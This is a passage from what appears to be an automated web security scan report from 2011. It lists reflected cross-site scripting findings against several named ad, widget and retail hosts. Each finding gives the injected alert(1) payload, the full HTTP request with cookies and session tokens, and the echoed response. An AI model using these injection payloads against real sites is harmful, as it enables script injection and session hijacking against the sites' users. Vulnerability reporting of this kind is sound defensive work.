This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=20029&f7366'-alert(1)-'b7e52cebacd=1 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3AA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3QA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:46:03 GMT
Age: 0
Connection: keep-alive
Content-Length: 11116

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
tp://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=20000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110426184603";})();$iTXT.js.serverUrl='http://realestate.msn.us.intellitxt.com';$iTXT.js.pageQuery='ipid=20029&f7366'-alert(1)-'b7e52cebacd=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

5.164. http://realestate.msn.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9c51d%3balert(1)//8c141cbb073 was submitted in the jscallback parameter. This input was echoed as 9c51d;alert(1)//8c141cbb073 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback09c51d%3balert(1)//8c141cbb073 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:47:45 GMT
Age: 0
Connection: keep-alive
Content-Length: 7166

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback09c51d;alert(1)//8c141cbb073({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

5.165. http://realestate.msn.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4bd9"-alert(1)-"7a83dccfee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback0&a4bd9"-alert(1)-"7a83dccfee2=1 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:47:55 GMT
Age: 0
Connection: keep-alive
Content-Length: 7147

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
illa/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","a4bd9"-alert(1)-"7a83dccfee2":"1","reg":"tx","refurl":"http://realestate.msn.com/article.aspx?cp-documentid\u003d28280145","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iT
...[SNIP]...

5.166. http://recs.richrelevance.com/rrserver/p13n_generated.js [ctp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The value of the ctp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6b87'%3balert(1)//32ed94e5709 was submitted in the ctp parameter. This input was echoed as d6b87';alert(1)//32ed94e5709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848188756&pt=%7Ccategory_page.bottom&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&s=bijb1vookoje2tnvwh5oouwn&ctp=%7C0%3Apromcode%253D600582C43552%7C1%3Apromtype%253Dinternald6b87'%3balert(1)//32ed94e5709&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:03:40 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; Expires=Sun, 14-May-2079 23:17:47 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 11848

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'category_page.bottom',html:'<div class="r3_recommendations"><div
...[SNIP]...
<a href="http://west.thomson.com/store/AddItem.aspx?Product_id=162495&MaterialNumber=22061301&Product_type=1&promcode=600582C43552&promtype=internald6b87';alert(1)//32ed94e5709">
...[SNIP]...

5.167. http://servedby.flashtalking.com/imp/3/14752 [94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the 94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 786bc"-alert(1)-"2db9af1c3c0 was submitted in the 94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:40:40 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061003 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="htt
...[SNIP]...

5.168. http://servedby.flashtalking.com/imp/3/14752 [cachebuster parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fd9e"-alert(1)-"1376e3d3251 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:40 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061008 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/94537/186988/js/j-9453
...[SNIP]...

5.169. http://servedby.flashtalking.com/imp/3/14752 [ftadz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71dab"-alert(1)-"4addb22c6fd was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:19 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061008 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.flashtalk
...[SNIP]...

5.170. http://servedby.flashtalking.com/imp/3/14752 [ftscw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af48e"-alert(1)-"d29e837d092 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:30 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061005 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com
...[SNIP]...

5.171. http://servedby.flashtalking.com/imp/3/14752 [ftx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5368a"-alert(1)-"128e10b5eda was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:40:51 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 464
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061006 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://c
...[SNIP]...

5.172. http://servedby.flashtalking.com/imp/3/14752 [fty parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84b00"-alert(1)-"cac21056698 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:07 GMT
Server: Jetty(6.1.22)
Content-Length: 464
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061001 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.fl
...[SNIP]...

5.173. http://servedby.flashtalking.com/imp/3/14752 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14752

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be3a7"-alert(1)-"c5145c4eafe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1210EC55BB9841"

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:41:45 GMT
Server: Jetty(6.1.22)
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 467
Via: 1.1 mdw061008 (MII-APC/1.6)


var ftGUID_94537="1210EC55BB9841";
var ftConfID_94537="0";
var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1";
var ftKeyword_94537="";
var ftSegment_94537="";
var ftSegmentList_94537=[];
var ftRuleMatch_94537="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/94537/163477/js/j-94
...[SNIP]...

5.174. http://wd.sharethis.com/api/getApi.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getApi.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 9663e<script>alert(1)</script>4a63942b3e0 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getApi.php?return=json&url=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&fpc=8f316ea-12f93c9a01d-4bc8d0c8-1&cb=initWidgetOnSuccess9663e<script>alert(1)</script>4a63942b3e0&service=initWidget HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.1f60cca3a67f69342fce2ed55af68ca9.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1; __uset=yes

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:52:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 173

initWidgetOnSuccess9663e<script>alert(1)</script>4a63942b3e0({"status":"SUCCESS","data":{"session_token":"3ea745cefeac0fd864be11a335bc6904","require_captcha":1,"ga":true}});

5.175. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the FindingMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970be"style%3d"x%3aexpression(alert(1))"b6e0c02100b was submitted in the FindingMethod parameter. This input was echoed as 970be"style="x:expression(alert(1))"b6e0c02100b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation970be"style%3d"x%3aexpression(alert(1))"b6e0c02100b HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:19:00 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=B612B053E7FF82CE9AE83EB452A041411CF7CB35034F5F59275166074B2D6F9942F4C02C9C6A4752B4EE8BF68E389C72C1EEC5FE403114AD3E025999AD1D3A7D8509CDCBDB9610BFE52B48A5DBA0737F36A325443BB35BCD968D0DCA188F04C3D64497A9C8415EB8225C80F43851731C945453DEB02A102C2975B09929F6C6805BF4A3F18E5E8F4C73AC20E4A75C41A2A78E3438D61F0AFF8143E7411A5A73910C7405229C7448FA582A6DCD1DEE6C9B1DFA606925BBC7B865D777B1C0E2286B6E2D7C4AEE0299D6916D920B569263B589ADEFE279BBD963E96FA9C694FFA7566F5BE5DA; expires=Tue, 26-Apr-2011 20:48:45 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
